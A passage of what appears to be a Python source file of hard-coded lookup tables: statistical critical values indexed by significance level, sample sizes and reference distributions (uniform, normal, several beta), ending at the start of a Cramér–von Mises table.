0.040363816396343344}, 300: {'uni': 0.08877082904027409, 'nor': 0.20230056685424241, 'beta1': 0.0892045849308271, 'beta2': 0.1336762783031652, 'beta4': 0.046694189532298924}, 200: {'uni': 0.09521605691554982, 'nor': 0.20745003836138798, 'beta1': 0.09002076182309414, 'beta2': 0.14011661109027673, 'beta4': 0.057187663505482156}, 150: {'uni': 0.10136020236794296, 'nor': 0.21186943326805385, 'beta1': 0.09104611326846368, 'beta2': 
0.1473809348866521, 'beta4': 0.06636195162267067}, 100: {'uni': 0.11533493817169593, 'nor': 0.22268646748177195, 'beta1': 0.10124550813275801, 'beta2': 0.1601077268001888, 'beta4': 0.08126272311296007}, 75: {'uni': 0.1269965695852332, 'nor': 0.23055614273483438, 'beta1': 0.11618044158873528, 'beta2': 0.16938005363200836, 'beta4': 0.09468104187919912}, 50: {'uni': 0.14865284782727461, 'nor': 0.24696834892452627, 'beta1': 0.1404127307767683, 'beta2': 0.18957960935246276, 'beta4': 0.1167721820183078}, 30: {'uni': 0.184923823116925, 'nor': 0.27382056048837045, 'beta1': 0.17891559108637778, 'beta2': 0.22039797844074127, 'beta4': 0.15358516539031264}, 20: {'uni': 0.22119035292803724, 'nor': 0.304517491178646, 'beta1': 0.21765673628337645, 'beta2': 0.2524910203909854, 'beta4': 0.19029690570897123}, 10: {'uni': 0.3023407524707935, 'nor': 0.3728834325973778, 'beta1': 0.3009333240399166, 'beta2': 0.3231264581550173, 'beta4': 0.2754491139259927}}}, 0.3: {1000: {1000: {'uni': 0.030570556366491086, 'nor': 0.036289126652867154, 'beta1': 0.030583281607816093, 'beta2': 0.04730099054512937, 'beta4': 0.027928049313802772}, 750: {'uni': 0.03530316336772765, 'nor': 0.039975128387633396, 'beta1': 0.03548791254752648, 'beta2': 0.04903397020548944, 'beta4': 0.03276890983776548}, 500: {'uni': 0.04335100802104869, 'nor': 0.047243089590878945, 'beta1': 0.04320767542248788, 'beta2': 0.05406062302488723, 'beta4': 0.04082881841396535}, 400: {'uni': 0.048281092293393224, 'nor': 0.05205613503513076, 'beta1': 0.04839219227783753, 'beta2': 0.05736812647420142, 'beta4': 0.04577289803172907}, 300: {'uni': 0.05576437362285486, 'nor': 0.058754859846003094, 'beta1': 0.05561895544923556, 'beta2': 0.06376771212789967, 'beta4': 0.0536396672811823}, 200: {'uni': 0.06807572111096638, 'nor': 0.07039249496628318, 'beta1': 0.06817615907229235, 'beta2': 0.07430836655124429, 'beta4': 0.066284048834367}, 150: {'uni': 0.07830726923539255, 'nor': 0.08091810478755601, 'beta1': 0.07807558772859324, 'beta2': 
0.08365151347909958, 'beta4': 0.07647958259852394}, 100: {'uni': 0.09565657848301334, 'nor': 0.0981123740412867, 'beta1': 0.09587885037300997, 'beta2': 0.10003610046247435, 'beta4': 0.09378950313692502}, 75: {'uni': 0.10998073605007008, 'nor': 0.11214689636427033, 'beta1': 0.11019075143205581, 'beta2': 0.11354410085085964, 'beta4': 0.10847644171113585}, 50: {'uni': 0.13428431589627038, 'nor': 0.1352778263583828, 'beta1': 0.1339667315839076, 'beta2': 0.1367603615159646, 'beta4': 0.13324126975406497}, 30: {'uni': 0.17274539443709994, 'nor': 0.17277197187209536, 'beta1': 0.17259686934288682, 'beta2': 0.17455077451940057, 'beta4': 0.17209316662270396}, 20: {'uni': 0.20849017587916696, 'nor': 0.21018909590633755, 'beta1': 0.20978229440378748, 'beta2': 0.210556894106393, 'beta4': 0.20983525727222768}, 10: {'uni': 0.2922169330616662, 'nor': 0.29235515396060796, 'beta1': 0.2914316509769965, 'beta2': 0.29365520324231675, 'beta4': 0.2918719921765267}}, 750: {1000: {'uni': 0.03059448158059208, 'nor': 0.037494550974039864, 'beta1': 0.03057665642636398, 'beta2': 0.04757089622996813, 'beta4': 0.027541558054662435}, 750: {'uni': 0.03510618818786626, 'nor': 0.04119138451985416, 'beta1': 0.03541571187769252, 'beta2': 0.04928902750824704, 'beta4': 0.03230008384262106}, 500: {'uni': 0.0431773659571921, 'nor': 0.048603218782619584, 'beta1': 0.043287997446947, 'beta2': 0.0546730633316056, 'beta4': 0.04048647809949074}, 400: {'uni': 0.04824116558225555, 'nor': 0.05321843834621287, 'beta1': 0.048199305013701704, 'beta2': 0.05800775236698885, 'beta4': 0.04530463746309643}, 300: {'uni': 0.05540518670798833, 'nor': 0.05982198884996326, 'beta1': 0.05567771562072299, 'beta2': 0.06397030785670665, 'beta4': 0.053117582056761314}, 200: {'uni': 0.06772031378900262, 'nor': 0.07116110493731592, 'beta1': 0.06816649733957653, 'beta2': 0.07445014600178901, 'beta4': 0.06569301339546207}, 150: {'uni': 0.07825718715284269, 'nor': 0.08109665950539868, 'beta1': 0.0781046497986293, 'beta2': 
0.08456066993421218, 'beta4': 0.0760047555558192}, 100: {'uni': 0.09560224022937375, 'nor': 0.09783638693011121, 'beta1': 0.09584895290202361, 'beta2': 0.10104976356957773, 'beta4': 0.0933672980698591}, 75: {'uni': 0.11025701077751521, 'nor': 0.11241322058286463, 'beta1': 0.11027559531133363, 'beta2': 0.1146920311954221, 'beta4': 0.10829053112713038}, 50: {'uni': 0.1348035578662452, 'nor': 0.13548682039682758, 'beta1': 0.13551492026149686, 'beta2': 0.13742355171140241, 'beta4': 0.13319685684134053}, 30: {'uni': 0.17183186657209226, 'nor': 0.17337212860618245, 'beta1': 0.17194526495477658, 'beta2': 0.17514496328394213, 'beta4': 0.17170411964854926}, 20: {'uni': 0.20996377678372924, 'nor': 0.21037655192180804, 'beta1': 0.2091953390508008, 'beta2': 0.21268253320487945, 'beta4': 0.20887454279336315}, 10: {'uni': 0.2925813013469445, 'nor': 0.2934970209180323, 'beta1': 0.2903843227554898, 'beta2': 0.292154024055348, 'beta4': 0.29025052699691306}}, 500: {1000: {'uni': 0.030652753404500244, 'nor': 0.04025690717821617, 'beta1': 0.030458725319031765, 'beta2': 0.049452523707565255, 'beta4': 0.026981460357740128}, 750: {'uni': 0.035255881858022864, 'nor': 0.04408262087996018, 'beta1': 0.03533505950722848, 'beta2': 0.05114773735578226, 'beta4': 0.031654754917049166}, 500: {'uni': 0.04332946212438382, 'nor': 0.050711888523930104, 'beta1': 0.043188647812777536, 'beta2': 0.056694190819294554, 'beta4': 0.03937922946595157}, 400: {'uni': 0.048011092268698596, 'nor': 0.055004776506215936, 'beta1': 0.04817813554171174, 'beta2': 0.06059305610807844, 'beta4': 0.04451593078130045}, 300: {'uni': 0.05595247678173959, 'nor': 0.06136644245697265, 'beta1': 0.05542281776135362, 'beta2': 0.06619403671726683, 'beta4': 0.05220515153028432}, 200: {'uni': 0.06793933725045043, 'nor': 0.072898052813477, 'beta1': 0.067644332252282, 'beta2': 0.07738699602692958, 'beta4': 0.06489369991242622}, 150: {'uni': 0.07828090175002178, 'nor': 0.08301359537151642, 'beta1': 0.07815202804646415, 'beta2': 
0.08680541880550621, 'beta4': 0.07563081329347063}, 100: {'uni': 0.09519553412075393, 'nor': 0.09944204457595673, 'beta1': 0.09607238042455157, 'beta2': 0.10213640052628101, 'beta4': 0.09308677814519356}, 75: {'uni': 0.10987316808535197, 'nor': 0.11376703529598509, 'beta1': 0.11023390350368756, 'beta2': 0.11604916566241219, 'beta4': 0.10758493316270056}, 50: {'uni': 0.13478443657887695, 'nor': 0.13740298760950306, 'beta1': 0.13406829393670033, 'beta2': 0.13903979048229387, 'beta4': 0.13262398989576224}, 30: {'uni': 0.17197956239052636, 'nor': 0.17432046908514903, 'beta1': 0.17182749783377138, 'beta2': 0.1754950827809304, 'beta4': 0.17133978839693642}, 20: {'uni': 0.2092323475175519, 'nor': 0.2121086324057767, 'beta1': 0.20789680345483424, 'beta2': 0.21277241600873145, 'beta4': 0.20863390282366368}, 10: {'uni': 0.2917818325981677, 'nor': 0.29390261172986865, 'beta1': 0.29469106553609536, 'beta2': 0.2925795869784428, 'beta4': 0.29103683472752606}}, 400: {1000: {'uni': 0.030479441749132086, 'nor': 0.04242546169128053, 'beta1': 0.030684562640612367, 'beta2': 0.04928918568341689, 'beta4': 0.026564469238728072}, 750: {'uni': 0.035330745692963184, 'nor': 0.045726585835036526, 'beta1': 0.035249379001672465, 'beta2': 0.051449055827561985, 'beta4': 0.031085761627238417}, 500: {'uni': 0.04298425565078945, 'nor': 0.05219112197292464, 'beta1': 0.04291699141997607, 'beta2': 0.05671446941827829, 'beta4': 0.03879788587172339}, 400: {'uni': 0.04841156712913064, 'nor': 0.0567067838815154, 'beta1': 0.04826292059676973, 'beta2': 0.06080155637236173, 'beta4': 0.04387502981511732}, 300: {'uni': 0.05551848242038693, 'nor': 0.06314336913027119, 'beta1': 0.055995408019056725, 'beta2': 0.06670707901265915, 'beta4': 0.05161729197545491}, 200: {'uni': 0.06753280207209278, 'nor': 0.07418549342747993, 'beta1': 0.06780632083464455, 'beta2': 0.07849742855872144, 'beta4': 0.06417277685422138}, 150: {'uni': 0.07892131000767688, 'nor': 0.08428480798230137, 'beta1': 0.07802952658645362, 'beta2': 
0.08721266316087362, 'beta4': 0.07509578556966912}, 100: {'uni': 0.09561040817701183, 'nor': 0.10046283966596203, 'beta1': 0.09553795639618262, 'beta2': 0.10295978967769193, 'beta4': 0.09309270468588221}, 75: {'uni': 0.10996879959002176, 'nor': 0.11403749710690919, 'beta1': 0.10970089630785607, 'beta2': 0.11687400266180792, 'beta4': 0.10767273652342291}, 50: {'uni': 0.1341573935423448, 'nor': 0.13750721156433715, 'beta1': 0.13357309262133255, 'beta2': 0.139422581194317, 'beta4': 0.13196955935935817}, 30: {'uni': 0.1719839698851492, 'nor': 0.17517615589326285, 'beta1': 0.171936226302963, 'beta2': 0.1757297703717665, 'beta4': 0.17054913647066844}, 20: {'uni': 0.20962568415417043, 'nor': 0.21093017482022178, 'beta1': 0.2109531327417335, 'beta2': 0.2124421410702677, 'beta4': 0.20866942953199907}, 10: {'uni': 0.2915846887153032, 'nor': 0.29318333013550635, 'beta1': 0.29230277183835673, 'beta2': 0.2935460494777875, 'beta4': 0.28943585016669493}}, 300: {1000: {'uni': 0.03073870905118381, 'nor': 0.0453721867186922, 'beta1': 0.030539757310093174, 'beta2': 0.051014128266916536, 'beta4': 0.02630816348221443}, 750: {'uni': 0.03527707956428239, 'nor': 0.04863496689192515, 'beta1': 0.03535272337640838, 'beta2': 0.05309247098188674, 'beta4': 0.030847740239343002}, 500: {'uni': 0.043103093119915115, 'nor': 0.05537548898945838, 'beta1': 0.043192985581247845, 'beta2': 0.05832301347306265, 'beta4': 0.03827598384084602}, 400: {'uni': 0.048262357386229554, 'nor': 0.05896990305419164, 'beta1': 0.048041282307002886, 'beta2': 0.06273926833030019, 'beta4': 0.04347619692280544}, 300: {'uni': 0.05560700720185019, 'nor': 0.06551918373036114, 'beta1': 0.05595087210581695, 'beta2': 0.07079250726314845, 'beta4': 0.050855969461618744}, 200: {'uni': 0.06812841845448789, 'nor': 0.07631719062877812, 'beta1': 0.06791089524731492, 'beta2': 0.08017905748846188, 'beta4': 0.0633369247159101}, 150: {'uni': 0.07810976084211943, 'nor': 0.08571298221651569, 'beta1': 0.07824014285292191, 'beta2': 
0.08865175294154615, 'beta4': 0.07411587643546858}, 100: {'uni': 0.09592845950854673, 'nor': 0.10235667303102258, 'beta1': 0.09560853089329824, 'beta2': 0.10410221530439875, 'beta4': 0.09145854216968004}, 75: {'uni': 0.11015610349253213, 'nor': 0.1161051824359548, 'beta1': 0.10967509979155243, 'beta2': 0.11812739483956008, 'beta4': 0.10661075747218696}, 50: {'uni': 0.13390288180005772, 'nor': 0.13883954661488274, 'beta1': 0.13467234949737394, 'beta2': 0.14042225887719018, 'beta4': 0.13136625179037467}, 30: {'uni': 0.1724189791803339, 'nor': 0.17610514891945817, 'beta1': 0.1721264669585005, 'beta2': 0.17732195199566786, 'beta4': 0.16928963468833258}, 20: {'uni': 0.20941682201461762, 'nor': 0.21215745594224503, 'beta1': 0.209618043392665, 'beta2': 0.21371395755354405, 'beta4': 0.20720457780049284}, 10: {'uni': 0.29136573039108826, 'nor': 0.2953533906937393, 'beta1': 0.2915141637355504, 'beta2': 0.2947095663135966, 'beta4': 0.289661443618565}}, 200: {1000: {'uni': 0.03064984686392691, 'nor': 0.05043451860288389, 'beta1': 0.03064869204617815, 'beta2': 0.05363856162776437, 'beta4': 0.025837623182089042}, 750: {'uni': 0.035114470743031645, 'nor': 0.053636498003354405, 'beta1': 0.03554354970773452, 'beta2': 0.05641494858720919, 'beta4': 0.030228871955573333}, 500: {'uni': 0.04344683479356848, 'nor': 0.05942737801622866, 'beta1': 0.043048920849664496, 'beta2': 0.06112458005245336, 'beta4': 0.037499090398733725}, 400: {'uni': 0.04819713799051478, 'nor': 0.06309225457944956, 'beta1': 0.04838699880676922, 'beta2': 0.06781833446638641, 'beta4': 0.0425087448681592}, 300: {'uni': 0.05572898393078207, 'nor': 0.06952530258059553, 'beta1': 0.05570841382179792, 'beta2': 0.07285768572268875, 'beta4': 0.049575966762646265}, 200: {'uni': 0.06807383659418853, 'nor': 0.0801618017819507, 'beta1': 0.06801333859302938, 'beta2': 0.08234805993218725, 'beta4': 0.062140022551191165}, 150: {'uni': 0.07824711164133136, 'nor': 0.08923127184269253, 'beta1': 0.07883741776826814, 'beta2': 
0.09251067651440004, 'beta4': 0.07291587380406012}, 100: {'uni': 0.09560431314077711, 'nor': 0.10450815715126349, 'beta1': 0.09567404787638834, 'beta2': 0.10773887846339109, 'beta4': 0.0902075650584725}, 75: {'uni': 0.10977650182622334, 'nor': 0.11816618106678134, 'beta1': 0.1102669991197075, 'beta2': 0.12049187221799695, 'beta4': 0.1048324984984148}, 50: {'uni': 0.1343039124732452, 'nor': 0.14086250431567415, 'beta1': 0.13455177937493012, 'beta2': 0.14203349915576058, 'beta4': 0.1302572093652935}, 30: {'uni': 0.1724479563898607, 'nor': 0.1782054960600049, 'beta1': 0.1720655432067857, 'beta2': 0.1780270710205825, 'beta4': 0.16818233155276918}, 20: {'uni': 0.2093785331688025, 'nor': 0.2140572740180554, 'beta1': 0.21029145111991537, 'beta2': 0.21456930963381293, 'beta4': 0.20682532198274484}, 10: {'uni': 0.29202855251861926, 'nor': 0.2954659784755673, 'beta1': 0.292463352998359, 'beta2': 0.2955290443845223, 'beta4': 0.2887217045817}}, 150: {1000: {'uni': 0.030838216779515926, 'nor': 0.055018265206959294, 'beta1': 0.030517843339180506, 'beta2': 0.05608372418016283, 'beta4': 0.025431929019819777}, 750: {'uni': 0.035362123917898614, 'nor': 0.058457030173542646, 'beta1': 0.03537517904333426, 'beta2': 0.058769180918217145, 'beta4': 0.029837989943044763}, 500: {'uni': 0.043213922318430464, 'nor': 0.06424368163594418, 'beta1': 0.04316681258670646, 'beta2': 0.06710587272080526, 'beta4': 0.03703364619373262}, 400: {'uni': 0.04833376337863218, 'nor': 0.06756792606856232, 'beta1': 0.04799783573268496, 'beta2': 0.07039870056739572, 'beta4': 0.041724718744219014}, 300: {'uni': 0.05586146681024584, 'nor': 0.07329310314756038, 'beta1': 0.05529638444154705, 'beta2': 0.07558336097154274, 'beta4': 0.04886164431709525}, 200: {'uni': 0.06794570035955794, 'nor': 0.08378073139649633, 'beta1': 0.06823928564341947, 'beta2': 0.0860472972006906, 'beta4': 0.06117936529617951}, 150: {'uni': 0.07839758781878625, 'nor': 0.09231986974590034, 'beta1': 0.07844421422032721, 'beta2': 
0.09371209848751239, 'beta4': 0.07131228351352475}, 100: {'uni': 0.09586975657519081, 'nor': 0.10714675207140412, 'beta1': 0.09559347574817811, 'beta2': 0.11002902848994539, 'beta4': 0.08959146899533599}, 75: {'uni': 0.11010826171433234, 'nor': 0.12126074477384846, 'beta1': 0.10990930848644964, 'beta2': 0.12178803610217631, 'beta4': 0.10380949345486348}, 50: {'uni': 0.1343214298555367, 'nor': 0.14247203802994213, 'beta1': 0.13385227759189416, 'beta2': 0.14299792348234408, 'beta4': 0.12836902924407073}, 30: {'uni': 0.1725778251785654, 'nor': 0.17826765858321283, 'beta1': 0.17232850345099437, 'beta2': 0.17902665877961377, 'beta4': 0.16804486300951366}, 20: {'uni': 0.20923828034878794, 'nor': 0.21505427759471324, 'beta1': 0.20947316437016195, 'beta2': 0.21556344537944894, 'beta4': 0.205296822907456}, 10: {'uni': 0.2912969465283485, 'nor': 0.29786616175121944, 'beta1': 0.2921180556905318, 'beta2': 0.2942536240063773, 'beta4': 0.28867921289925763}}, 100: {1000: {'uni': 0.031072383442646623, 'nor': 0.06286992752019249, 'beta1': 0.030625891912101244, 'beta2': 0.05879416691552142, 'beta4': 0.025203295860677627}, 750: {'uni': 0.03580272688057862, 'nor': 0.06614015652523586, 'beta1': 0.035330967643673494, 'beta2': 0.06164117508809697, 'beta4': 0.029546455172328512}, 500: {'uni': 0.04347491725851127, 'nor': 0.07103887819755894, 'beta1': 0.04288278858954275, 'beta2': 0.06950563628146106, 'beta4': 0.036250627429170346}, 400: {'uni': 0.04841725320908952, 'nor': 0.07515276106744045, 'beta1': 0.048207874825495156, 'beta2': 0.07281441955053547, 'beta4': 0.04106938703316515}, 300: {'uni': 0.05581361792803008, 'nor': 0.0804344767904921, 'beta1': 0.05549497359097222, 'beta2': 0.07860014494562395, 'beta4': 0.04816835176472789}, 200: {'uni': 0.0680104028224871, 'nor': 0.0899287719835754, 'beta1': 0.06768158716081898, 'beta2': 0.08861735552692984, 'beta4': 0.059838070085047684}, 150: {'uni': 0.07830299427203302, 'nor': 0.09823952555336729, 'beta1': 0.0781938574456082, 'beta2': 
0.09864482170689659, 'beta4': 0.07000041446264826}, 100: {'uni': 0.09572762933073209, 'nor': 0.11370380350455811, 'beta1': 0.09588982413073177, 'beta2': 0.11254326539068987, 'beta4': 0.0872727084042092}, 75: {'uni': 0.10972174136249069, 'nor': 0.1261032950814237, 'beta1': 0.10998724073974103, 'beta2': 0.1250175630115139, 'beta4': 0.10149116692916582}, 50: {'uni': 0.1346226891470239, 'nor': 0.1474470477708189, 'beta1': 0.13398284073629363, 'beta2': 0.14605045540182798, 'beta4': 0.12656776186643182}, 30: {'uni': 0.171289729627625, 'nor': 0.18300803860826304, 'beta1': 0.17197133058640537, 'beta2': 0.18045847672308146, 'beta4': 0.16615899142928847}, 20: {'uni': 0.20948265436898134, 'nor': 0.21820996754149108, 'beta1': 0.2083154616981402, 'beta2': 0.21682018217589444, 'beta4': 0.20368889712319002}, 10: {'uni': 0.29332092603556315, 'nor': 0.29884771959554113, 'beta1': 0.2928639451085291, 'beta2': 0.29596957653109623, 'beta4': 0.287993475210005}}, 75: {1000: {'uni': 0.03154718546267052, 'nor': 0.07044763487600164, 'beta1': 0.030523906995489347, 'beta2': 0.06095775037531781, 'beta4': 0.025178612703061598}, 750: {'uni': 0.03587641128641306, 'nor': 0.07299193497447859, 'beta1': 0.035281289240443936, 'beta2': 0.06385369106198494, 'beta4': 0.029127736955950057}, 500: {'uni': 0.04391766277410497, 'nor': 0.07813329575242478, 'beta1': 0.04340596642353545, 'beta2': 0.07179729219122671, 'beta4': 0.036086430090033816}, 400: {'uni': 0.048844097708170386, 'nor': 0.08183669421171236, 'beta1': 0.04807797399750002, 'beta2': 0.07521514498858767, 'beta4': 0.04049563308356163}, 300: {'uni': 0.0559940480059955, 'nor': 0.08609350845523445, 'beta1': 0.055831745197134575, 'beta2': 0.0826010220686782, 'beta4': 0.04713573528154402}, 200: {'uni': 0.0683453076733273, 'nor': 0.09540815213423537, 'beta1': 0.06790338184860889, 'beta2': 0.09158709481883592, 'beta4': 0.059111816398762285}, 150: {'uni': 0.07844185085801125, 'nor': 0.10391542371009366, 'beta1': 0.07831073142916842, 'beta2': 
0.10032168899848526, 'beta4': 0.06888011570999455}, 100: {'uni': 0.09594855642525024, 'nor': 0.11746142695193407, 'beta1': 0.09516113565651263, 'beta2': 0.11488209132926885, 'beta4': 0.08612950477373915}, 75: {'uni': 0.10978056964178606, 'nor': 0.13039658706335377, 'beta1': 0.11037351197141043, 'beta2': 0.12760478930659974, 'beta4': 0.10050946376158554}, 50: {'uni': 0.1342077394648763, 'nor': 0.15134188483531175, 'beta1': 0.13361807973321893, 'beta2': 0.14895024123184664, 'beta4': 0.1248108548205345}, 30: {'uni': 0.17154364522069487, 'nor': 0.18473249458088753, 'beta1': 0.17248033985600267, 'beta2': 0.18331185817811452, 'beta4': 0.16423432417184547}, 20: {'uni': 0.20782941225027318, 'nor': 0.22146906910281994, 'beta1': 0.209751594461421, 'beta2': 0.2173162603888529, 'beta4': 0.20159255474557342}, 10: {'uni': 0.291334076187922, 'nor': 0.2992867706784435, 'beta1': 0.29261596744170054, 'beta2': 0.2960163189286691, 'beta4': 0.28524371036426077}}, 50: {1000: {'uni': 0.0329993154562257, 'nor': 0.08207318747113157, 'beta1': 0.030671468325690204, 'beta2': 0.06648424648000095, 'beta4': 0.02488381017609015}, 750: {'uni': 0.03738443452448176, 'nor': 0.08572544936677795, 'beta1': 0.035303282232089284, 'beta2': 0.07002036286325686, 'beta4': 0.028894147053289826}, 500: {'uni': 0.044737763029671695, 'nor': 0.08966708732648676, 'beta1': 0.04340465898409554, 'beta2': 0.07682945882872405, 'beta4': 0.03548424878981277}, 400: {'uni': 0.04937088906781539, 'nor': 0.09281018247408995, 'beta1': 0.04840075745360373, 'beta2': 0.07992875043033376, 'beta4': 0.03972236374485255}, 300: {'uni': 0.056674883766536566, 'nor': 0.09773596053700151, 'beta1': 0.05549753161205717, 'beta2': 0.08714041454214849, 'beta4': 0.04659758746289444}, 200: {'uni': 0.06860153239416655, 'nor': 0.10630954521453767, 'beta1': 0.06793537494136576, 'beta2': 0.09641941459565317, 'beta4': 0.05784887912329589}, 150: {'uni': 0.0787453526380626, 'nor': 0.11324399916126676, 'beta1': 0.07869495808729748, 'beta2': 
0.10493442734242159, 'beta4': 0.06755025538156267}, 100: {'uni': 0.09522502884464878, 'nor': 0.12666649348936998, 'beta1': 0.0955330448453976, 'beta2': 0.11990014749723277, 'beta4': 0.08427352133834594}, 75: {'uni': 0.1100197062263768, 'nor': 0.13833028774850076, 'beta1': 0.10986631872332808, 'beta2': 0.13176370778245594, 'beta4': 0.09870160730848387}, 50: {'uni': 0.13421155841951937, 'nor': 0.15941967086434394, 'beta1': 0.1339691684883051, 'beta2': 0.15279416514019803, 'beta4': 0.12213609394490166}, 30: {'uni': 0.1721102987741357, 'nor': 0.19290136415164644, 'beta1': 0.1729701132110737, 'beta2': 0.18618368178105146, 'beta4': 0.16098989092313043}, 20: {'uni': 0.20807791188346714, 'nor': 0.2270631379617466, 'beta1': 0.20884121198766303, 'beta2': 0.22035377475051882, 'beta4': 0.1999515315854391}, 10: {'uni': 0.28942960019437525, 'nor': 0.30528957184252636, 'beta1': 0.29033509284968895, 'beta2': 0.3002914665011813, 'beta4': 0.2840920174861028}}, 30: {1000: {'uni': 0.03740912638303681, 'nor': 0.1036739698595659, 'beta1': 0.03212037925335687, 'beta2': 0.07451381449879518, 'beta4': 0.024765179813423077}, 750: {'uni': 0.04113538401988681, 'nor': 0.10564716613623504, 'beta1': 0.03524754243631689, 'beta2': 0.07840817147245094, 'beta4': 0.028582301342003846}, 500: {'uni': 0.04768205798272118, 'nor': 0.10893592471801378, 'beta1': 0.043098984557192854, 'beta2': 0.08429395075959556, 'beta4': 0.035281334521673924}, 400: {'uni': 0.052145846598435464, 'nor': 0.11218348141224654, 'beta1': 0.048316311309606494, 'beta2': 0.08737730595826376, 'beta4': 0.03951837119677115}, 300: {'uni': 0.058719416850484873, 'nor': 0.11635156663185392, 'beta1': 0.05539882042196062, 'beta2': 0.09410523757141842, 'beta4': 0.04574881189356261}, 200: {'uni': 0.07049814833509804, 'nor': 0.12466200180191964, 'beta1': 0.06800412320163807, 'beta2': 0.10367008819351042, 'beta4': 0.05653287408590357}, 150: {'uni': 0.07998404492207556, 'nor': 0.13156596855270042, 'beta1': 0.07831590231210439, 'beta2': 
0.11171068575197618, 'beta4': 0.0660458608943065}, 100: {'uni': 0.09736733051622676, 'nor': 0.14383411909324195, 'beta1': 0.09527581350107495, 'beta2': 0.1266963468351454, 'beta4': 0.08165556587689915}, 75: {'uni': 0.11099146175383867, 'nor': 0.15454031497016313, 'beta1': 0.11017526259797866, 'beta2': 0.13795208288587246, 'beta4': 0.09575531965915296}, 50: {'uni': 0.13538536757080866, 'nor': 0.17221057810453794, 'beta1': 0.1338257169878449, 'beta2': 0.15804741489707852, 'beta4': 0.11922046414258292}, 30: {'uni': 0.1712608697310144, 'nor': 0.205400562436021, 'beta1': 0.17222575085713476, 'beta2': 0.19119060032529278, 'beta4': 0.1565519610771569}, 20: {'uni': 0.2068845576782115, 'nor': 0.23594894671277633, 'beta1': 0.20857821881607397, 'beta2': 0.2242706036141524, 'beta4': 0.1940900991677027}, 10: {'uni': 0.29081139802402245, 'nor': 0.31265691993665123, 'beta1': 0.29235607151474635, 'beta2': 0.3015701463278587, 'beta4': 0.2789156239002969}}, 20: {1000: {'uni': 0.04642868998031713, 'nor': 0.12332330472504827, 'beta1': 0.04718089852596563, 'beta2': 0.08438078560427192, 'beta4': 0.02457559775898424}, 750: {'uni': 0.04842165313054653, 'nor': 0.12556727406528229, 'beta1': 0.04738271045571918, 'beta2': 0.08834690715792337, 'beta4': 0.028340709811087494}, 500: {'uni': 0.053533279505937725, 'nor': 0.12887684121155335, 'beta1': 0.0479593523582066, 'beta2': 0.093134206549116, 'beta4': 0.034852424538950655}, 400: {'uni': 0.056828739022670716, 'nor': 0.13151540254532723, 'beta1': 0.04877580382157087, 'beta2': 0.09653221115404376, 'beta4': 0.03906534512633897}, 300: {'uni': 0.06308823466796709, 'nor': 0.13632125697142994, 'beta1': 0.0557557473436297, 'beta2': 0.10253109087801837, 'beta4': 0.04531815758557228}, 200: {'uni': 0.07360180211640582, 'nor': 0.1432942311893014, 'beta1': 0.0681727970568623, 'beta2': 0.11121417118399335, 'beta4': 0.05595760960414742}, 150: {'uni': 0.08288729795659577, 'nor': 0.15043917273012375, 'beta1': 0.0783065570550272, 'beta2': 0.11935424277145812, 
'beta4': 0.06470942284344405}, 100: {'uni': 0.09859178235766261, 'nor': 0.16124156030703884, 'beta1': 0.0958462390352337, 'beta2': 0.13264339398473482, 'beta4': 0.08038263656370306}, 75: {'uni': 0.11264602897630796, 'nor': 0.17162756566496928, 'beta1': 0.1093583226332463, 'beta2': 0.1449055731559286, 'beta4': 0.0936741537870105}, 50: {'uni': 0.1351538849647479, 'nor': 0.1891059788104762, 'beta1': 0.13353828395816583, 'beta2': 0.16446554293023208, 'beta4': 0.11692137693757179}, 30: {'uni': 0.17267793406617293, 'nor': 0.2194410481865578, 'beta1': 0.1715183906280785, 'beta2': 0.19549280548078546, 'beta4': 0.15280157061971122}, 20: {'uni': 0.2080554278862089, 'nor': 0.2504069566387129, 'beta1': 0.20849205040193286, 'beta2': 0.22837347924333673, 'beta4': 0.1902516928790116}, 10: {'uni': 0.2889268854801783, 'nor': 0.32163657747008745, 'beta1': 0.29149738853371904, 'beta2': 0.30355224871981534, 'beta4': 0.27571078427238804}}, 10: {1000: {'uni': 0.07592862842758177, 'nor': 0.17675731917954068, 'beta1': 0.0877969299631155, 'beta2': 0.11144784434222144, 'beta4': 0.02460170484284585}, 750: {'uni': 0.07759279278991063, 'nor': 0.1772870041660417, 'beta1': 0.0879620025181791, 'beta2': 0.11460621564738957, 'beta4': 0.02832708685480334}, 500: {'uni': 0.08065845775127545, 'nor': 0.17989701264902008, 'beta1': 0.08783750916584376, 'beta2': 0.11712110163722245, 'beta4': 0.03467098270876123}, 400: {'uni': 0.08256541536026196, 'nor': 0.18417802004566128, 'beta1': 0.08790601108528329, 'beta2': 0.12019289656717527, 'beta4': 0.03891946560744147}, 300: {'uni': 0.08559905562808945, 'nor': 0.18462701647872692, 'beta1': 0.08826474685236314, 'beta2': 0.12439317845494924, 'beta4': 0.044963765983094595}, 200: {'uni': 0.09169859151319848, 'nor': 0.19139039112626904, 'beta1': 0.08930844976492569, 'beta2': 0.13136678111208, 'beta4': 0.054792012779084076}, 150: {'uni': 0.09812163743144275, 'nor': 0.19750433547881496, 'beta1': 0.09057788640231174, 'beta2': 0.13861898534255174, 'beta4': 
0.06359560963591554}, 100: {'uni': 0.11008343360793232, 'nor': 0.20777204018968287, 'beta1': 0.09689906172316676, 'beta2': 0.15021550515080317, 'beta4': 0.07807825052420148}, 75: {'uni': 0.12242653071663401, 'nor': 0.215751343862846, 'beta1': 0.11085258086667488, 'beta2': 0.16074658563892358, 'beta4': 0.0909916380632606}, 50: {'uni': 0.1425128725621415, 'nor': 0.23236256807944267, 'beta1': 0.13421822598853264, 'beta2': 0.17967686927808513, 'beta4': 0.11246630487802428}, 30: {'uni': 0.1756938390152408, 'nor': 0.25727221518650933, 'beta1': 0.17068207541412989, 'beta2': 0.2079075053657387, 'beta4': 0.1469866126893361}, 20: {'uni': 0.21140412281823978, 'nor': 0.28677376608134897, 'beta1': 0.20711509883306756, 'beta2': 0.2384287148752032, 'beta4': 0.18262460986524906}, 10: {'uni': 0.28890701868848456, 'nor': 0.3541341956391229, 'beta1': 0.28845583251972085, 'beta2': 0.3104258261391907, 'beta4': 0.2639310068340357}}}} # noqa: E501, E231 crit_val_upd_cm = {0.05: {1000: {1000: {'uni': 0.45559810479972657, 'nor': 0.8517883181720683, 'beta1': 0.46148158376018295, 'beta2': 2.5871697557890188, 'beta4': 0.31747502464750654}, 750: {'uni': 0.46139038881877054, 'nor': 0.7435903262011547, 'beta1': 0.45311472469817826, 'beta2': 1.9077935301454356, 'beta4': 0.32427601703371456}, 500: {'uni': 0.46902770162756147, 'nor': 0.6520675952105567, 'beta1': 0.4585639552609696, 'beta2': 1.3749405307284122, 'beta4': 0.3505515605224531}, 400: {'uni': 0.46369685433009517, 'nor': 0.6086007217455988, 'beta1': 0.46599917293822524, 